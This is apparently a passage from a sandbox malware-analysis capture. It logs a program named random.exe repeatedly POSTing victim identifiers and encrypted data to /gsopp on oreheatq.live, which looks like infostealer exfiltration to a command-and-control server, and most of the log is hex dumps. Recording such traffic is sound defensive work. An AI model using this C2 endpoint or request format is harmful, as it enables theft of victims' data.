2025-03-29 13:23:16 UTC	1369	IN	Data Raw: 30 29 70 d3 f7 07 3e 22 3c 77 3c eb 44 12 bf 6b 48 d9 a2 eb af 03 ed 84 51 26 37 57 a7 8f 44 34 e6 45 11 e2 d5 51 80 9e f2 23 e0 7a 20 1a 12 5e e2 f8 d2 b3 64 e8 ae 82 ac 43 6a e7 e8 ad 92 c4 4b e6 80 6e 0a 0e 19 9c 75 9a 59 44 54 69 01 d0 ab c2 82 19 28 da 68 27 0e e6 c9 90 1b d1 96 d1 b5 89 a9 f1 51 1e 66 70 2b 5a 89 eb df ac 82 64 0a bb 1d d8 71 39 e5 18 ed 5a 2c 0d 22 67 e5 3b ac bc b3 fb 82 41 0a ae 58 ca a4 a2 68 44 2c da 94 c3 3d 5a 30 b7 19 f9 51 54 d0 76 4e 63 09 ff ea e0 f0 86 50 49 db 05 f8 9b b3 52 b2 49 73 5f bf 64 ef 23 68 17 b4 a5 23 79 2d 92 a9 c2 9b 46 2e 7d 4a 10 36 59 d7 c9 d1 16 5f d6 96 11 92 85 13 5f 5c 0b 3b 79 cc 55 3f bb f4 a7 ee d9 33 ca d5 98 2e cd d2 79 ed 02 2e 3a b9 4e 73 32 03 2a 26 4d 3d 5b c8 f1 ed 68 02 93 36 f3 7e 0f 24 Data Ascii: 0)p>"<w<DkHQ&7WD4EQ#z ^dCjKnuYDTi(h'Qfp+Zdq9Z,"g;AXhD,=Z0QTvNcPIRIs_d#h#y-F.}J6Y__\;yU?3.y.:Ns2*&M=[h6~$
2025-03-29 13:23:16 UTC	1369	IN	Data Raw: 8a a1 9f 31 99 2e e6 d7 0f ff 81 d0 b6 7f da 71 35 88 93 6b f6 b3 95 8c 7e d9 81 a8 73 4a 6a ec d9 d3 79 19 96 36 da ad 35 3b 46 57 02 6e e5 a9 f3 c7 47 9f e9 50 7f 43 e1 10 17 71 c6 d4 19 7e bb 10 2a bf f6 4b 97 f1 44 88 c9 b4 90 d3 b2 db 31 24 de ff 82 ec 7a 88 b9 de 83 30 da a1 1a c8 c0 31 3e ca 3b 0c 1f d9 07 14 52 87 5e 57 ed 5e c4 67 af 88 06 1f 94 43 a1 04 ff 42 ef 6a 88 20 5d d8 24 55 2e b0 57 c3 1e f9 65 e2 61 c9 1c f9 a8 e9 98 46 3f 86 f6 25 3d fb bb a1 a0 4b bb f5 7f e4 c8 44 5f 1d 70 9e 2a 25 c7 c1 ad 4d c4 41 ec f3 0d 33 3a 91 93 21 17 fd 14 70 00 20 2c c9 7f 1e ff 62 61 8e 45 7d af 5b 53 1d b6 cf 20 6e 9e 24 a4 cf 08 d7 74 2b d5 34 b8 2c 11 b8 a9 39 6c 3b 38 58 60 f2 9c 3f 59 a8 6e 34 9e 31 63 43 6a ff 86 90 9e 69 ed 01 5c 9b a9 85 c9 dd 80 Data Ascii: 1.q5k~sJjy65;FWnGPCq~KD1$z01>;R^W^gCBj ]$U.WeaF?%=KD_p%MA3:!p ,baE}[S n$t+4,9l;8X`?Yn41cCji\
2025-03-29 13:23:16 UTC	1369	IN	Data Raw: fa 98 20 97 a7 70 b4 84 ea 63 e4 ec cc e9 c7 f8 4c 40 d6 d5 cc 19 41 d8 a2 66 ef 42 7a 92 3d 4a 8c 18 a1 f8 24 b0 b1 c1 b6 26 de 8f 0c 7c cc 9b e3 50 c5 62 b6 9d d9 50 09 19 45 e5 98 00 9d f3 d1 0b 1d ee 15 88 65 61 ae 8e 62 f0 a0 d9 90 10 4c ba 89 b2 6e ba 91 5e 22 12 df 14 cc bb 0f c3 99 d4 fb a6 ea 3a 92 68 64 a5 13 d0 77 47 7c 3c 2c ff 36 1b 9d 8e 9a 44 dd 10 8c 36 14 9b 13 dd 9c 48 8d f7 4b 80 ec 10 40 2e b1 6f e8 d4 45 70 6d a9 d8 c8 ed e0 2f 32 e4 93 2d 4b 51 24 f3 e2 b0 e2 27 2c e2 49 76 1e d5 09 de 20 f1 3b 4e 2d 6d 75 8e 1b 2e a1 01 38 82 11 35 bd 51 09 47 1a af 71 4e e7 29 bb 70 6f 4b 4a 0e a7 41 52 b7 61 c6 e9 c9 eb 6e c8 ac 24 7b 9c 52 10 19 22 a4 a1 70 cb 61 cf 92 b0 28 f1 01 85 cb 04 be 92 9e 60 1e 53 4b ac f6 05 51 bb bc ab be 9b ad 39 e7 Data Ascii: pcL@AfBz=J$&\|PbPEeabLn^":hdwG\|<,6D6HK@.oEpm/2-KQ$',Iv ;N-mu.85QGqN)poKJARan${R"pa(`SKQ9
2025-03-29 13:23:16 UTC	1369	IN	Data Raw: ea fc de 84 3d 30 f1 4a 64 65 2e 74 db 8b ce 72 dc 61 26 ae c6 7a cf 7e 30 e2 e5 b8 6e 3c 3e 01 36 50 25 f5 6c 6b b2 01 a6 0f 8d d6 c8 fd 22 39 9d c6 39 b6 ca 9c b7 09 c7 7f 5a 51 8e d1 7b 83 ba 37 68 c1 ea 63 69 d3 27 a2 f6 7a 20 93 c7 5d cb ee b5 69 44 4e de 74 38 42 68 c1 16 21 10 3b da 3e 4b ae 30 c1 1c f3 46 a2 a5 a3 9b 8b cd e7 74 d7 c7 04 c2 e7 3c df 76 25 4c 00 09 be 1e 72 0a 7a 82 05 8e 85 2d 42 91 82 cd 9d cf ec 83 25 06 7d ed d3 e6 d7 d7 27 07 ce 19 a3 db c8 e6 4e a5 2a 8e 5f 80 70 cc 4a 34 cb 3d d7 e4 83 91 b4 33 eb 4c b0 18 d3 28 e6 69 04 2c b2 f7 8d 10 8e e8 50 eb 4b 16 4d fc 2d 49 75 24 e7 b9 87 fb e5 ff b7 07 11 b4 62 be 1b 3e 89 a8 29 52 06 4a a4 c4 1c 91 98 50 d1 cc 66 61 ed 5e fc 0f e9 21 42 90 af 88 3c e5 af 9b f4 9f 1c b2 3e db 84 17 Data Ascii: =0Jde.tra&z~0n<>6P%lk"99ZQ{7hci'z ]iDNt8Bh!;>K0Ft<v%Lrz-B%}'N*_pJ4=3L(i,PKM-Iu$b>)RJPfa^!B<>
2025-03-29 13:23:16 UTC	1369	IN	Data Raw: b3 7a 56 d9 19 2a c0 2e 8f a6 e3 14 55 52 e5 00 61 c4 4d ec 58 b4 9e 23 c9 a3 b3 e3 90 a6 09 10 19 11 ce 49 ff ae 9b c3 09 fe 02 42 72 3f 45 5e e4 08 16 6c 68 41 90 8e 67 85 7b 1e c8 90 fd 39 7d 75 49 ff 9b ea f9 8a 91 d5 93 33 d4 86 33 9d 0b 9c a5 2d 3b cb 07 4c 8f 51 fa 1c 5c aa 22 6d 5f f3 db 47 4f 9e ab 16 15 cb a0 38 47 db 11 27 38 7b ce f9 18 75 b4 0b 59 5a 30 a7 28 79 c9 e2 74 3e 1b 3a 9e c7 2a 56 c7 42 0f d3 fc 99 65 46 43 b9 00 97 cd a7 e6 e6 6c b8 1a ab 09 ad 87 c8 a7 5d 95 61 9d 94 d5 82 b1 41 ee ba ed a5 d1 e4 68 65 e6 3a 2b 82 83 85 c7 1b 1c 33 b3 e3 f8 08 16 00 44 d5 53 22 15 30 30 3e af e0 4e 21 0b c2 58 1a f3 6b 67 e6 db b0 3f 25 37 4e f2 b3 cc dd 92 83 a3 1e f2 1a 59 f1 be 92 69 ee e9 79 78 06 00 56 ab e5 07 de ff c2 ed f0 af 22 ff ec 72 Data Ascii: zV.URaMX#IBr?E^lhAg{9}uI33-;LQ\"m_GO8G'8{uYZ0(yt>:VBeFCl]aAhe:+3DS"00>N!Xkg?%7NYiyxV"r
2025-03-29 13:23:16 UTC	997	IN	Data Raw: 46 48 56 03 5e 89 81 d4 76 9f a0 98 83 d6 0a 30 78 e8 52 c7 ec 8a 87 5e 4d b7 49 84 4a 55 74 1f 20 36 99 ba 00 64 70 45 ea 40 7e 15 38 e6 61 8d f0 64 7d e9 13 41 89 54 51 32 5b 00 15 30 91 de 3b f0 0d ae db aa 84 be 98 f4 a8 fd 47 ba c3 fb 4a 67 21 23 54 6b 6a b2 be a2 8d 92 90 86 e8 23 6c 8f d5 3b 4e 14 f1 ba c9 c6 4a 3b f8 b7 64 e6 ad 88 c6 7a a4 f8 df 62 9d 51 ec 61 d3 d3 a5 51 00 78 ef 82 00 64 de 1d 68 cf 03 a7 76 9d 58 f9 0a cc 74 65 94 00 92 d0 34 40 9d d7 dc 19 63 1a 04 40 14 fc 81 e6 47 e0 4f eb c7 1f 7c f9 e5 07 a6 3e fe ab 81 99 a7 2d 22 2b c6 0f 3e 61 74 1e 6a 3b e6 7b bb a9 0b 06 d7 ab 25 7c 7c c0 41 06 46 9c f8 7a 31 b8 8c 5e f1 df 8c 7d 42 e6 e1 67 cb 44 84 e6 66 0c f4 7a ef 0b 57 f8 b1 f5 4a f6 6e 02 68 a7 10 3f db c6 00 3f f1 6a fb e8 e4 Data Ascii: FHV^v0xR^MIJUt 6dpE@~8ad}ATQ2[0;GJg!#Tkj#l;NJ;dzbQaQxdhvXte4@c@GO\|>-"+>atj;{%\|\|AFz1^}BgDfzWJnh??j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49682	172.67.172.183	443	6160	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-29 13:23:17 UTC	276	OUT	POST /gsopp HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GO9MlvO4InAGh User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 14483 Host: oreheatq.live
2025-03-29 13:23:17 UTC	14483	OUT	Data Raw: 2d 2d 47 4f 39 4d 6c 76 4f 34 49 6e 41 47 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 38 31 33 33 30 30 66 37 36 32 65 30 66 36 63 39 30 37 61 34 30 65 32 62 33 32 39 61 36 30 35 33 36 32 39 38 31 38 31 65 39 0d 0a 2d 2d 47 4f 39 4d 6c 76 4f 34 49 6e 41 47 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 4f 39 4d 6c 76 4f 34 49 6e 41 47 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 31 37 30 38 41 42 39 45 35 31 46 41 35 35 46 33 Data Ascii: --GO9MlvO4InAGhContent-Disposition: form-data; name="uid"c813300f762e0f6c907a40e2b329a60536298181e9--GO9MlvO4InAGhContent-Disposition: form-data; name="pid"2--GO9MlvO4InAGhContent-Disposition: form-data; name="hwid"C71708AB9E51FA55F3
2025-03-29 13:23:18 UTC	264	IN	HTTP/1.1 200 OK Date: Sat, 29 Mar 2025 13:23:18 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Server: cloudflare Vary: Accept-Encoding Cf-Cache-Status: DYNAMIC CF-RAY: 927fae5529c86a52-EWR alt-svc: h3=":443"; ma=86400
2025-03-29 13:23:18 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 34 35 2e 39 32 2e 32 32 39 2e 31 36 35 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 45.92.229.165"}}
2025-03-29 13:23:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49683	172.67.172.183	443	6160	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-29 13:23:19 UTC	276	OUT	POST /gsopp HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=pAGrlEY2fhv27 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 15045 Host: oreheatq.live
2025-03-29 13:23:19 UTC	15045	OUT	Data Raw: 2d 2d 70 41 47 72 6c 45 59 32 66 68 76 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 38 31 33 33 30 30 66 37 36 32 65 30 66 36 63 39 30 37 61 34 30 65 32 62 33 32 39 61 36 30 35 33 36 32 39 38 31 38 31 65 39 0d 0a 2d 2d 70 41 47 72 6c 45 59 32 66 68 76 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 70 41 47 72 6c 45 59 32 66 68 76 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 31 37 30 38 41 42 39 45 35 31 46 41 35 35 46 33 Data Ascii: --pAGrlEY2fhv27Content-Disposition: form-data; name="uid"c813300f762e0f6c907a40e2b329a60536298181e9--pAGrlEY2fhv27Content-Disposition: form-data; name="pid"2--pAGrlEY2fhv27Content-Disposition: form-data; name="hwid"C71708AB9E51FA55F3
2025-03-29 13:23:19 UTC	264	IN	HTTP/1.1 200 OK Date: Sat, 29 Mar 2025 13:23:19 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Server: cloudflare Vary: Accept-Encoding Cf-Cache-Status: DYNAMIC CF-RAY: 927fae5c7b6d8ae3-EWR alt-svc: h3=":443"; ma=86400
2025-03-29 13:23:19 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 34 35 2e 39 32 2e 32 32 39 2e 31 36 35 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 45.92.229.165"}}
2025-03-29 13:23:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49684	172.67.172.183	443	6160	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-29 13:23:19 UTC	275	OUT	POST /gsopp HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=n4x183CtEOAS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 20365 Host: oreheatq.live
2025-03-29 13:23:19 UTC	15331	OUT	Data Raw: 2d 2d 6e 34 78 31 38 33 43 74 45 4f 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 38 31 33 33 30 30 66 37 36 32 65 30 66 36 63 39 30 37 61 34 30 65 32 62 33 32 39 61 36 30 35 33 36 32 39 38 31 38 31 65 39 0d 0a 2d 2d 6e 34 78 31 38 33 43 74 45 4f 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 6e 34 78 31 38 33 43 74 45 4f 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 31 37 30 38 41 42 39 45 35 31 46 41 35 35 46 33 45 39 36 Data Ascii: --n4x183CtEOASContent-Disposition: form-data; name="uid"c813300f762e0f6c907a40e2b329a60536298181e9--n4x183CtEOASContent-Disposition: form-data; name="pid"3--n4x183CtEOASContent-Disposition: form-data; name="hwid"C71708AB9E51FA55F3E96
2025-03-29 13:23:19 UTC	5034	OUT	Data Raw: 9c 08 c1 44 45 98 f7 b7 5c 95 c1 9c b9 ce d1 84 34 a6 ba e1 a3 78 8f 8b 65 f4 ff ee cb 6b 65 fe 14 07 74 5f 25 00 6c 57 21 ef f4 99 df 34 8a 08 01 66 7e 50 e2 a8 0f 3e 51 c0 c9 68 b2 25 a4 f9 0b 22 3a 56 98 a6 9e 53 cf 0b a0 1f 81 b1 b0 12 06 e4 80 6d d3 22 7f fa 3c f2 af 1d a0 6e 72 24 7d 51 87 1b 29 8c 87 f6 4e 95 8d 2a ed 93 4e e0 ba 5d 7d 5b 5f eb 7f f1 b8 c7 46 85 ad 56 f0 61 fe 46 9b 18 5b 1f 1e c8 75 df 82 40 a8 4f d2 d9 97 6f 9b 80 38 9f 0a 7c ad 21 11 43 2d 93 cf a8 0b 77 1e ba 30 0f 31 66 4a bd 65 8c 70 2d 46 5d 98 9c 27 98 c6 89 d2 7d 3f 9f b5 82 d0 90 a9 0e aa 82 10 f7 17 1d 0a e1 f6 fe 9a 3e f8 d8 e8 a9 6b 6b 41 3e 05 d5 4e bf d7 0e 38 ad 2d 15 c3 0b 5b b5 b8 4c 1c a6 2d df 1b 71 7b 9a ac ac 83 27 6d ab d3 35 64 eb 6b 7e 0c df 3a ad 19 29 ae Data Ascii: DE\4xeket_%lW!4f~P>Qh%":VSm"<nr$}Q)N*N]}[_FVaF[u@Oo8\|!C-w01fJep-F]'}?>kkA>N8-[L-q{'m5dk~:)
2025-03-29 13:23:20 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 29 Mar 2025 13:23:20 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4khXgw8ey3tnUnDz7rR8l%2F6M6bQiYxcQrnDmMQubyPm6XyFaoqeLk4B7%2Bde78PxhdHx7dL8WTrdybGO2xboBVjSRevALT62JUZX0gCcHyEDQdEGm3Y%2FP%2BaZ6N6MCecPX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 927fae624e286dc6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=101269&min_rtt=100531&rtt_var=22317&sent=16&recv=28&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21320&delivery_rate=29743&cwnd=252&unsent_bytes=0&cid=0857c12d869b4c30&ts=569&x=0"
2025-03-29 13:23:20 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 34 35 2e 39 32 2e 32 32 39 2e 31 36 35 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 45.92.229.165"}}
2025-03-29 13:23:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49685	172.67.172.183	443	6160	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-29 13:23:21 UTC	277	OUT	POST /gsopp HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=zAQUQ5Y2Qd96OWU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 2484 Host: oreheatq.live
2025-03-29 13:23:21 UTC	2484	OUT	Data Raw: 2d 2d 7a 41 51 55 51 35 59 32 51 64 39 36 4f 57 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 38 31 33 33 30 30 66 37 36 32 65 30 66 36 63 39 30 37 61 34 30 65 32 62 33 32 39 61 36 30 35 33 36 32 39 38 31 38 31 65 39 0d 0a 2d 2d 7a 41 51 55 51 35 59 32 51 64 39 36 4f 57 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 7a 41 51 55 51 35 59 32 51 64 39 36 4f 57 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 31 37 30 38 41 42 39 45 35 31 Data Ascii: --zAQUQ5Y2Qd96OWUContent-Disposition: form-data; name="uid"c813300f762e0f6c907a40e2b329a60536298181e9--zAQUQ5Y2Qd96OWUContent-Disposition: form-data; name="pid"1--zAQUQ5Y2Qd96OWUContent-Disposition: form-data; name="hwid"C71708AB9E51
2025-03-29 13:23:22 UTC	802	IN	HTTP/1.1 200 OK Date: Sat, 29 Mar 2025 13:23:22 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehjq8trmQdqkAcUtFfcv6J5bQLhVmsiNnT%2FqQuHgb1AEI3gH%2BSE2gXaEYEZ3enjPjkHnWTfKRFNbLKG3i3m031YOX2pWU3MMjZ0qMv%2FehA8Dv5K4fC46x3Qnw1ft2cSk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 927fae6d0c8a41c6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=104206&min_rtt=101166&rtt_var=24532&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2832&recv_bytes=3397&delivery_rate=30209&cwnd=252&unsent_bytes=0&cid=187d0e7f83fe60c4&ts=604&x=0"
2025-03-29 13:23:22 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 34 35 2e 39 32 2e 32 32 39 2e 31 36 35 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 45.92.229.165"}}
2025-03-29 13:23:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49686	172.67.172.183	443	6160	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-29 13:23:23 UTC	283	OUT	POST /gsopp HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=t6t6Cfr5CdhQh28b69Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 549837 Host: oreheatq.live
2025-03-29 13:23:23 UTC	15331	OUT	Data Raw: 2d 2d 74 36 74 36 43 66 72 35 43 64 68 51 68 32 38 62 36 39 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 38 31 33 33 30 30 66 37 36 32 65 30 66 36 63 39 30 37 61 34 30 65 32 62 33 32 39 61 36 30 35 33 36 32 39 38 31 38 31 65 39 0d 0a 2d 2d 74 36 74 36 43 66 72 35 43 64 68 51 68 32 38 62 36 39 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 74 36 74 36 43 66 72 35 43 64 68 51 68 32 38 62 36 39 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a Data Ascii: --t6t6Cfr5CdhQh28b69QContent-Disposition: form-data; name="uid"c813300f762e0f6c907a40e2b329a60536298181e9--t6t6Cfr5CdhQh28b69QContent-Disposition: form-data; name="pid"1--t6t6Cfr5CdhQh28b69QContent-Disposition: form-data; name="hwid"
2025-03-29 13:23:23 UTC	15331	OUT	Data Raw: 8e e5 44 cd 64 ab 10 86 d8 50 10 a6 f8 59 82 ab dc a1 28 b1 1c 18 45 be f1 7f 08 05 5e 17 df 0f b8 b8 89 a5 a6 b6 29 c1 5b 5f f7 47 9f d2 8e 2c 58 44 e6 a2 e1 5d 71 25 4e e9 09 34 5a 6b b5 03 a2 d2 30 3a 78 5f df 2c 46 f3 f9 2c 10 16 e5 60 e6 eb c4 fc f4 86 19 44 39 db 4d 12 ce ab fb 69 ca 3a 62 3a e3 02 85 83 a0 dc 5b 64 58 e3 5c 07 d4 f7 51 23 3f 0a 5e dc c2 8b 3f d1 53 a6 7f 16 8d d9 92 92 0b 04 6f 3d b4 ee 44 44 26 40 45 d0 ce 10 bb 79 8b d2 05 19 13 eb b3 58 b5 53 51 fc 4d 3f e6 a3 fe c3 87 fa 41 da 7f b1 e8 e8 d8 63 d4 1b 1e 2c 96 05 12 42 b5 51 6d c2 4f be c6 2d 51 b4 f8 e9 0a 36 56 a3 df c1 cc f9 ea 56 9b d2 62 8f 4f 6d 45 de ca 9e 95 be f0 58 71 e8 ed 2e bd 3e f9 39 d7 b7 ce 40 21 b8 1c 7c 47 5d 0d 3a 47 8f c0 81 40 c9 fa 9b 0b 46 9e 21 39 b8 57 Data Ascii: DdPY(E^)[_G,XD]q%N4Zk0:x_,F,`D9Mi:b:[dX\Q#?^?So=DD&@EyXSQM?Ac,BQmO-Q6VVbOmEXq.>9@!\|G]:G@F!9W
2025-03-29 13:23:23 UTC	15331	OUT	Data Raw: f8 ce 45 07 27 87 d5 8e 95 ae ce 2e 0f 0a 71 5b d7 25 d0 8d d2 aa d7 eb 91 a5 f2 8f 65 d5 30 d1 62 e6 74 2b 7b 80 f1 2d d9 b2 e8 d7 e9 27 6f 1d 0b 50 a7 32 d1 e8 93 83 ad c7 5d 83 cd 6a e9 f7 56 ea 19 ec e4 04 39 ef c1 35 00 a1 d1 12 d4 a3 8a 39 ef dc 99 8d 74 bc 95 f0 3f 42 e2 1e b1 fa 0c 4d 13 2f c5 2e 8e b0 54 94 7c 92 d2 92 85 14 2c 1f 94 f6 1d 88 23 9b 09 ed a4 83 0d 12 1a 56 83 af 22 73 e6 9c dd 9d 1a 5b 2c 49 49 78 d3 08 68 d5 3f f0 23 40 64 de 65 50 f5 6d d7 fc f7 d4 56 2f d9 f3 de 2c fc bc de bb 69 5a d3 cc 23 8f d2 91 69 9f 2d 77 10 a8 9b 30 65 a6 20 fc 27 32 0b 58 fd e5 a3 e7 fc 4e 31 c9 52 40 33 2e d5 4c e2 30 ff 4b e7 10 8e fb 16 7b 48 f8 25 87 17 fc 1a 0e e5 9a c2 88 94 eb db 23 8c c6 d2 74 a3 16 96 4d 1f 81 15 33 fc ee 27 ce 6c 29 00 6f 4e Data Ascii: E'.q[%e0bt+{-'oP2]jV959t?BM/.T\|,#V"s[,IIxh?#@dePmV/,iZ#i-w0e '2XN1R@3.L0K{H%#tM3'l)oN
